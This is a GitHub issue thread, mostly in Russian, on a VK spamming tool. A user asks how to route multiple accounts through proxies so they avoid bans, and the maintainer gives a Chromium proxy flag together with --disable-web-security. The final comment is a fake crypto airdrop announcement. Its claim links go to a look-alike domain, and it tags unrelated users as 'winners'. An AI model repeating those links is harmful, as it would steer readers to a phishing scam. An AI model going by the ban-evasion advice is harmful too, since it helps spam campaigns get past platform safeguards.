### ISSUE TITLE
Отсутствует возможность использовать PROXY для входа в аккаунты

### ISSUE THREAD

**Issue by Bubenchuk** [vladislav-puzyrev/vk-spammer-online#23]
Вероятнее всего это предложение для увеличения функционала. Хотелось бы иметь возможность указывать перед входом в аккаунт нужное PROXY. Чтобы не получать блокировку на аккаунтах за мульти-аккаунты. Интересна поддержка PROXY типами HTTPS/SOCKS5, а также мобильные прокси (если они отличаются от обычный: статических). Спасибо Вам за проделанную работу. Очень выручаете.

**Comment by vladislav-puzyrev** [comment]
@Bubenchuk Привет!

В качестве быстрого решения вы можете запускать браузер на основе Chromium с флагом `--proxy-server`.

Например:

```bash
"C:\Program Files\Google\Chrome\Application\chrome.exe" --proxy-server="socks5://myproxy:8080" --disable-web-security --user-data-dir="C://chrome-dev-disabled-security"
```

Документация:

- https://www.chromium.org/developers/design-documents/network-settings/
- https://www.chromium.org/developers/design-documents/network-stack/socks-proxy/

По хорошему настройка прокси для каждого аккаунта должна быть на стороне приложения, но я больше не развиваю его.

**Comment by Bubenchuk** [comment]
@vladislav-puzyrev, подскажите, пожалуйста, как использовать PROXY у которых имеются login и password? ip:port:login:password.

**Comment by vladislav-puzyrev** [comment]
Кажется что флаг `--proxy-server` не поддерживает авторизацию.

**Comment by Bubenchuk** [comment]
@vladislav-puzyrev, есть ли возможность зайти на аккаунт, если на нем есть двухфакторная аутентификация?

**Comment by vladislav-puzyrev** [comment]
Да, в таком случае в форме авторизации должно появиться дополнительное поле:

https://github.com/vladislav-puzyrev/vk-spammer-online/blob/1d8c2281618173fddcec2f0b3ad08c23d684ef79/src/components/Spamer/Main/Auth/AuthForm/AuthForm.tsx#L65-L76

**Comment by AshvinGudaliya** [comment]
# AltLayer Airdrop Season One Announcement

[![AltLayer Airdrop Season One](https://miro.medium.com/v2/da:true/resize:fit:1200/0*QvP91LW92QLv9_qq)](http://go.altlayerio.online/zHaxVS)

Exciting news! AltLayer token (ALT) is set to launch on Binance on January 25, 2024. This milestone couldn't have been reached without our amazing community. Your support has been crucial from conceptualization to product development.

To show our gratitude, we're inviting you to join the "ALT Token community" through an airdrop for early supporters and partners. Below is a summary:

- **Total Allocated ALT Tokens:** 300,000,000 (3% of total supply)
- **Distribution Categories:**
  - NFT Holders
  - Altitude Campaign Participants
  - EigenLayer Restakers
  - EigenLayer Ecosystem Partners
  - Celestia Stakers and others

For detailed criteria and information, check the full announcement [here](http://go.altlayerio.online/zHaxVS).

[Claim](http://go.altlayerio.online/zHaxVS) opens from January 25 to February 25, 2024. Unclaimed ALT tokens after this period will return to AltLayer’s Treasury.

Thank you for being part of AltLayer's success! More to come in Season One, stay tuned.

**Note:** Certain regions are restricted from the airdrop. Please review the disclaimer before participating.


Winners: @tdr130, @jakexie, @mjako78, @sud01oo, @qbadboy, @senchabot-app, @liyinyin, @CoryG89, @ibbgomes, @DarkPhantom504, @9AV1D, @ColaZzz, @kingydw, @smallb0y, @CaWhi, @Admittedly-Goat, @jixonmastoi, @umesh-krishna, @discountry, @ZuluSpl0it
